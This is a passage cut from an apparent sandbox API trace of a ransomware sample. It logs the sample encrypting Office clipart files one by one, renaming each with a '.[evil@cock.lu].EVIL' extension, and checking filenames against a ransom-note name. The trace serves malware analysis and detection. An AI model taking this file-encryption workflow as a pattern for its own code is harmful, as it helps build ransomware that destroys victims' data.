Office\\root\\CLIPART\\PUB60COR\\J0216570.WMF") returned 0x45 [0152.156] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216570.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216570.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.158] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x60dc, lpOverlapped=0x0) returned 1 [0152.176] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.176] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.176] _errno () returned 0x84b1160840 [0152.177] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.177] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x60e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x60e0, lpOverlapped=0x0) returned 1 [0152.177] CloseHandle (hObject=0x1a8) returned 1 [0152.177] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216570.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.177] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.177] __uncaught_exception () returned 0x84b1160800 [0152.177] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.178] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216570.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216570.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216570.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216570.wmf.[evil@cock.lu].evil")) returned 1 [0152.179] ??_V@YAXPEAX@Z () returned 0x1 [0152.182] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216570.WMF", dwFileAttributes=0x200) returned 0 [0152.182] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.182] wcsstr (_Str="J0216600.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.182] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216600.WMF") returned 69 [0152.182] wcscmp (_String1="J0216600.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.182] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0216600.WMF") returned 0x0 [0152.182] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216600.WMF") returned 0x45 [0152.182] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216600.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216600.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.184] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1f46, lpOverlapped=0x0) returned 1 [0152.190] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.190] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.190] _errno () returned 0x84b1160840 [0152.190] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.190] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x1f60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1f60, lpOverlapped=0x0) returned 1 [0152.190] CloseHandle (hObject=0x1a8) returned 1 [0152.191] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216600.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.191] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.191] __uncaught_exception () returned 0x84b1160800 [0152.191] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.191] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216600.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216600.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216600.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216600.wmf.[evil@cock.lu].evil")) returned 1 [0152.192] ??_V@YAXPEAX@Z () returned 0x1 [0152.196] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216600.WMF", dwFileAttributes=0x200) returned 0 [0152.196] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.196] wcsstr (_Str="J0216612.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.196] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216612.WMF") returned 69 [0152.196] wcscmp (_String1="J0216612.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.196] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0216612.WMF") returned 0x0 [0152.196] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216612.WMF") returned 0x45 [0152.196] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216612.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216612.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.198] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x24e2, lpOverlapped=0x0) returned 1 [0152.208] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.208] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.208] _errno () returned 0x84b1160840 [0152.208] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.208] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x2500, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2500, lpOverlapped=0x0) returned 1 [0152.208] CloseHandle (hObject=0x1a8) returned 1 [0152.208] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216612.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.208] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.208] __uncaught_exception () returned 0x84b1160800 [0152.209] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.209] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216612.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216612.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216612.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216612.wmf.[evil@cock.lu].evil")) returned 1 [0152.210] ??_V@YAXPEAX@Z () returned 0x1 [0152.213] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216612.WMF", dwFileAttributes=0x200) returned 0 [0152.213] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.213] wcsstr (_Str="J0216874.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.213] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216874.WMF") returned 69 [0152.213] wcscmp (_String1="J0216874.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.214] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0216874.WMF") returned 0x0 [0152.214] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216874.WMF") returned 0x45 [0152.214] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216874.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216874.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.216] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x9b3a, lpOverlapped=0x0) returned 1 [0152.234] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.234] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.234] _errno () returned 0x84b1160840 [0152.234] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.234] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x9b40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9b40, lpOverlapped=0x0) returned 1 [0152.234] CloseHandle (hObject=0x1a8) returned 1 [0152.234] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216874.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.234] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.235] __uncaught_exception () returned 0x84b1160800 [0152.235] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.235] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216874.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216874.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216874.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216874.wmf.[evil@cock.lu].evil")) returned 1 [0152.236] ??_V@YAXPEAX@Z () returned 0x1 [0152.239] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216874.WMF", dwFileAttributes=0x200) returned 0 [0152.239] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.239] wcsstr (_Str="J0217262.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.239] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217262.WMF") returned 69 [0152.239] wcscmp (_String1="J0217262.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.239] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0217262.WMF") returned 0x0 [0152.239] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217262.WMF") returned 0x45 [0152.239] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217262.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0217262.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.241] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1484, lpOverlapped=0x0) returned 1 [0152.245] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.245] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.245] _errno () returned 0x84b1160840 [0152.245] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.245] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x14a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x14a0, lpOverlapped=0x0) returned 1 [0152.245] CloseHandle (hObject=0x1a8) returned 1 [0152.245] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217262.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.246] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.246] __uncaught_exception () returned 0x84b1160800 [0152.246] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.246] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217262.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0217262.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217262.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0217262.wmf.[evil@cock.lu].evil")) returned 1 [0152.247] ??_V@YAXPEAX@Z () returned 0x1 [0152.250] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217262.WMF", dwFileAttributes=0x200) returned 0 [0152.250] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.250] wcsstr (_Str="J0217302.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.250] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217302.WMF") returned 69 [0152.251] wcscmp (_String1="J0217302.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.251] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0217302.WMF") returned 0x0 [0152.251] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217302.WMF") returned 0x45 [0152.251] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217302.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0217302.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.254] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xd9a, lpOverlapped=0x0) returned 1 [0152.270] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.270] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.270] _errno () returned 0x84b1160840 [0152.270] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.270] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0xda0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xda0, lpOverlapped=0x0) returned 1 [0152.270] CloseHandle (hObject=0x1a8) returned 1 [0152.270] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217302.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.271] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.271] __uncaught_exception () returned 0x84b1160800 [0152.271] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.271] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217302.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0217302.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217302.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0217302.wmf.[evil@cock.lu].evil")) returned 1 [0152.272] ??_V@YAXPEAX@Z () returned 0x1 [0152.275] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217302.WMF", dwFileAttributes=0x200) returned 0 [0152.276] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.276] wcsstr (_Str="J0217872.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.276] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217872.WMF") returned 69 [0152.276] wcscmp (_String1="J0217872.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.276] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0217872.WMF") returned 0x0 [0152.276] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217872.WMF") returned 0x45 [0152.276] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217872.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0217872.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.278] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1ca8, lpOverlapped=0x0) returned 1 [0152.281] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.281] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.281] _errno () returned 0x84b1160840 [0152.281] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.281] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x1cc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1cc0, lpOverlapped=0x0) returned 1 [0152.282] CloseHandle (hObject=0x1a8) returned 1 [0152.282] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217872.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.282] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.282] __uncaught_exception () returned 0x84b1160800 [0152.282] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.282] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217872.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0217872.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217872.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0217872.wmf.[evil@cock.lu].evil")) returned 1 [0152.283] ??_V@YAXPEAX@Z () returned 0x1 [0152.287] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217872.WMF", dwFileAttributes=0x200) returned 0 [0152.287] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.287] wcsstr (_Str="J0227419.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.287] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227419.JPG") returned 69 [0152.287] wcscmp (_String1="J0227419.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.287] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0227419.JPG") returned 0x0 [0152.287] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227419.JPG") returned 0x45 [0152.287] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227419.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0227419.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.289] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8ad6, lpOverlapped=0x0) returned 1 [0152.297] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.297] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.297] _errno () returned 0x84b1160840 [0152.297] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.297] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x8ae0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8ae0, lpOverlapped=0x0) returned 1 [0152.297] CloseHandle (hObject=0x1a8) returned 1 [0152.297] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227419.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.297] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.297] __uncaught_exception () returned 0x84b1160800 [0152.297] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.298] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227419.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0227419.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227419.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0227419.jpg.[evil@cock.lu].evil")) returned 1 [0152.298] ??_V@YAXPEAX@Z () returned 0x1 [0152.301] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227419.JPG", dwFileAttributes=0x200) returned 0 [0152.302] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.302] wcsstr (_Str="J0227558.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.302] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227558.JPG") returned 69 [0152.302] wcscmp (_String1="J0227558.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.302] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0227558.JPG") returned 0x0 [0152.302] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227558.JPG") returned 0x45 [0152.302] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227558.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0227558.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.304] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, 